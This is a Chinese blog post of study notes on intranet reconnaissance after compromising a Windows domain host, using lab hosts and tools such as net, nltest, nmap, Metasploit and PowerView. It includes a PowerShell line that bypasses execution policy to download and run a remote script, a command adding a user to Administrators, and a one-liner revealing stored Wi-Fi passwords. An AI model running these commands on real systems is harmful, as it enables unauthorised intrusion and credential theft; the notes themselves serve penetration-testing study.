头图:https://cdn.naraku.cn/imgs/Intranet-info-0.jpg
摘要:学习《内网安全攻防》的一些笔记。
基本信息
# 网络信息$ ipconfig /all # 查询网络配置信息# 系统信息$ systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" # 查询操作系统和软件信息$ systeminfo # 查看补丁列表$ wmic qfe get Caption,Description,HotFixID,InstallOn # 查看安装在系统的补丁# 服务信息$ wmic service list brief # 查询本机服务信息$ wmic process list brief # 查询进程列表$ wmic startup get commond,caption # 查看启动程序信息# 用户信息$ net user # 查询用户列表$ net localgroup Administrators # 本地管理员$ query user || qwinsta # 当前在线用户# 进程信息$ tasklist$ wmic process list brief# 其它信息$ netstat -ano # 查询端口列表$ net share # 查询本机共享列表$ route print # 路由表$ arp -a # ARP表$ ipconfig /displaydns # 查看dns缓存$ netsh firewall show config # 查询防火墙相关配置
查询当前权限
- 获取一台主机后,一般有3种情况:
- 本地普通用户,
win-2008\user - 本地管理员用户,
win7-test\administrator - 域内用户,
hacker\administrator
- 本地普通用户,
- 其中本地普通用户只能查询本机信息,不能查询域内信息,而本地管理员和域内用户均可查询域内信息。
- 域内所有查询都通过域控制器(DC)实现,而这个查询会自动使用Kerberos协议进行认证,无须输入账号密码。
- 获取域SID
- 当前域
hack-naraku的SID:S-1-5-21-1481718049-2714097393-3961720286 - 域用户
winuser的SID:S-1-5-21-1481718049-2714097393-3961720286-1108```shell $ whoami
- 当前域
用户名 SID =================== ============================================== hack-naraku\winuser S-1-5-21-1481718049-2714097393-3961720286-1108
- 查询指定用户信息- 该用户在本地组中没有本地管理员权限- 在域中属于`Domain Users`组```shell$ net user winuser /domain.............本地组成员全局组成员 *Domain Users.............
判断是否存在域
使用
ipconfig$ ipconfig /all$ nslookup <DNS服务器>
查询系统信息
- 域:域名。如果域为
WORKGROUP则表示当前服务器不在域内 - 登录服务器:域控制器
$ systeminfo
- 域:域名。如果域为
查询当前登录域及登录用户
- 工作站域DNS名称:域名。如果为
WORKGROUP则表示当前为非域环境 - 登录域:用于表示当前表示的用户是域用户还是本地用户
$ net config workstation
- 工作站域DNS名称:域名。如果为
判断主域
- 正常执行:存在域,且当前用户是域用户
- 拒绝访问:存在域,但当前用户不是域用户
- 找不到域
WORKGROUP的域控制器:不存在域$ net time /domain
探测域内存活主机
NetBIOS探测
nbtscan.exe:一个命令行工具,用于扫描目标网络中开放的NetBIOS名称服务器 ```shell $ nbtscan.exe 192.168.1.0/24
192.168.1.7 HACK-NARAKU\WIN7 SHARING 192.168.1.12 HACK-NARAKU\DC SHARING DC *timeout (normal end of scan)
<a name="0ca00ea7"></a>### ICMP探测- 对指定网段中的每个IP地址使用`ping`命令```shell$ for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="来自 192.168.1.7 的回复: 字节=32 时间<1ms TTL=128来自 192.168.1.12 的回复: 字节=32 时间=1ms TTL=128
ARP探测
arp-scan.exe```shell $ arp-scan.exe -t 192.168.1.0/24
Reply that 00:50:56:C0:00:01 is 192.168.1.1 in 2.870200 Reply that 00:0C:29:0A:7C:7F is 192.168.1.7 in 0.060100 Reply that 00:0C:29:93:97:DC is 192.168.1.12 in 16.301800 Reply that 00:50:56:EA:98:CF is 192.168.1.254 in 15.253300 Reply that 00:0C:29:0A:7C:7F is 192.168.1.255 in 0.102700
<a name="c022391c"></a>## 扫描域内端口- **Metasploit端口扫描**:MSF提供多种端口扫描技术,还提供与其它扫描工具的接口- 可在`msfconsole`下运行`search portscan`搜索端口扫描模块- 这里使用的是`auxiliary/scanner/portscan/tcp````shell$ msfconsolemsf5 > use auxiliary/scanner/portscan/tcpmsf5 auxiliary(scanner/portscan/tcp) > show optionsmsf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.12msf5 auxiliary(scanner/portscan/tcp) > set PORTS 1-1024msf5 auxiliary(scanner/portscan/tcp) > run[+] 192.168.1.12: - 192.168.1.12:53 - TCP OPEN.......[+] 192.168.1.12: - 192.168.1.12:636 - TCP OPEN[*] 192.168.1.12: - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
Nmap
$ nmap -sP 192.168.1.0/24
Netcat:端口Banner信息
$ nc -nv 192.168.1.12 22
Nishang中的
Scan/Invoke-PortScan.ps1模块- PowerSploit中的
Recon/Invoke-PortScan.ps1脚本 ```powershell远程下载脚本并执行
$ powershell.exe -nop -exec bypass -c “IEX(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1‘); Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘80,445,1433,8080,3389’ -oA temp.txt”
执行本地ps脚本
$ powershell.exe -nop -exec bypass -c “Import-Module C:\Invoke-Portscan.ps1; Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports ‘80,445,1433,8080,3389’ -oA temp.txt”
- 其它- telnet:需要先开启telnet服务```shell$ telnet 192.168.1.12 22
- S扫描器:早期的一个扫描器
域信息
需要先启动
Computer Browser服务
$ net view /domain # 查询域$ net view /domain:HACK-NARAKU # 查询域内所有计算机$ net group /domain # 查询域内所有用户组$ net group "domain computers" /domain # 查询所有域成员$ net accounts /domain # 查询域密码策略
nltest信任域
- 信任域:可以在工作组里查询,查询内网是否有域环境
- 参考:Nltest相关命令 ```shell $ nltest /domain_trusts
返回所有信任 192.168.1.7 的域
$ nltest /domain_trusts /all_trusts /v /server:<域控IP>
返回域控和其相对应的IP地址,XXXXX是上一条命令结果中的一个域
$ nltest /dsgetdc:
<a name="14ef23e2"></a>## 查找域控- 查看域控的机器名```shell$ nltest /DCLIST:hack-naraku获得域“hack-naraku”中 DC 的列表(从“\\DC”中)。DC.hack.naraku [PDC] [DS] 站点: Default-First-Site-Name此命令成功完成
- 查看域控的主机名 ```shell $ nslookup -type=SRV _ldap._tcp
DNS request timed out. timeout was 2 seconds. 服务器: UnKnown Address: 192.168.1.12
_ldap._tcp.hack.naraku SRV service location: priority = 0 weight = 100 port = 389 svr hostname = dc.hack.naraku dc.hack.naraku internet address = 192.168.1.12
- 查看时间```shell$ net time /domain\\DC.hack.naraku 的当前时间是 2020/10/19 12:38:28
- 查看域控组 ```shell $ net group “Domain Controllers” /domain
这项请求将在域 hack.naraku 的域控制器处理。
组名 Domain Controllers 注释 域中所有域控制器
成员
DC$ 命令成功完成。
<a name="5e4db065"></a>## 域用户信息- 查询所有域用户列表```shell$ net user /domain # 向域控进行查询$ wmic useraccount get /all # 获取域内用户信息$ net localgroup administrators # 查询本地管理员组用户
- 查询域管理员用户
$ net group "Domain Admins" /domain # 查询域管理员用户$ net group "Enterprise Admins" /domain # 查询管理员用户组
定位域管
- 参考:定位域管理员
概述
在一个域中,当计算机加入域后,会默认给域管理员赋予本地系统管理员权限。因此,域管理员均可以访问本地计算机,且具备完全控制权限。
定位域内管理员的两种渠道:日志和会话。
- 日志是指本地机器的管理员日志,可以使用脚本或
Wevtutil工具导出并查看。 - 会话是指域内每台机器的登陆会话,可以使用
netsess.exe或PowerView等工具查询(可匿名查询,无需权限)。
PsLoggedOn
PsLoggedOn.exe:可以查看本地登录的用户
- 原理:通过检验注册表里
HKEY_USERS的key值来查询谁登陆过机器(调用NetSessionEnum API) - 限制:部分功能需要管理员权限
$ PsLoggedon.exe
PVEFindADUser
PVEFindADUser.exe:用于查找Active Directory用户的登录位置、枚举域用户,以及查找在特定计算机上登陆的用户,包括本地用户、通过RDP登陆的用户、用于运行服务和计划任务的用户。
- 限制:运行该工具需要配置
.NET Framework 2.0环境,并且需要具有管理员权限。$ PVEFindADUser.exe -current
Netview
Netview.exe:使用
WinAPI枚举系统,利用NetSessionEnum找寻登陆会话,利用NetShareEnum找寻共享,利用NetWkstaUserEnum枚举登陆用户。同时,netview.exe能够查询共享入口和有价值的用户。
- 编译版本:https://malicious.link/projects/netview.exe
- 限制:绝大多数功能不需要管理员权限
$ netview.exe -d
Nmap的NSE脚本
Smb-enum-sessions.nse:如果存在域账户或者本地账户,就可以使用该脚本获取远程机器的登陆会话
- 限制:不需要管理员权限
| 脚本 | 描述 | | :—-: | :—-: | | smb-enum-domains | 尝试枚举系统上的域及其策略 | | smb-enum-users | 枚举远程Windows系统上的用户,并提供尽可能多的信息 | | smb-enum-shares | 便利远程主机共享目录 | | smb-enum-processes | 通过SMB从远程服务器提取进程列表,可以知道目标主机运行哪些软件。需要管理员权限 | | smb-enum-sessions | 枚举在本地或通过SMB共享登录到系统的用户 | | smb-os-discovery | 尝试通过SMB协议(端口445或139)确定操作系统,计算机名称,域,工作组和当前时间。 |$ nmap --script=smb-enum-sessions 192.168.1.1
PowerView
PowerView是一款依赖powershell和WMI对内网进行查询的常用渗透测试脚本,集成在powersploit工具包中,是一个收集域信息很好用的脚本。
# 定位域管理员$ powershell.exe -exec bypass -c "Import-Module C:\PowerView.ps1; Invoke-UserHunter"
查找域管理进程
一个典型的域权限提升过程,通常围绕着收集明文凭据或通过
Mimikatz提权等方法。在获取了管理员权限的系统中寻找域管理员登录进程,进而收集域管理员的凭据。
$ tasklist /v # 列出本机的所有进程及进程用户$ net group "Domain Admins" /domain # 获取域管理员列表$ net group "Domain Controllers" /domain # 查询域控制器列表
Powershell收集信息
$ Get-ExecutionPolicy # 查看执行策略$ Set-ExecutionPolicy Unrestricted # 修改执行策略(需管理员权限)# 利用PowerView$ Import-Module .\PowerView.ps1Get-NetDomain # 获取当前用户所在域的名称Get-NetUser # 获取所有用户的详细信息Get-NetComputer # 获取域内所有机器的详细信息Get-NetShare # 获取当前域内所有的共享信息Get-ADObject # 获取活动目录的对象(内容超级多)Invoke-UserHunter # 获取域用户登陆的计算机信息,以及该用户是否有本地管理员权限Invoke-ProcessHunter # 通过查询域内所有的机器进程找到特定用户
其它
- 用户信息
- 权限:
system > administrator > user```shell $ net user /domain # 查看域用户 $ net group “domain admins” /domain # 查看域管理员 $ net group “domain controllers” /domain # 查看域控制器 $ nltest /domain_trusts # 查看域信任
- 权限:
其它
$ query user # 查看在线用户
$ net user # 查看全部用户
$ net user naraku # 查看指定用户: net user
$ net localgroup administrators naraku /add # 添加到Administrators组: net localgroup administrators
查看wifi密码
$ for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear ```
若有收获,就点个赞吧
0 人点赞
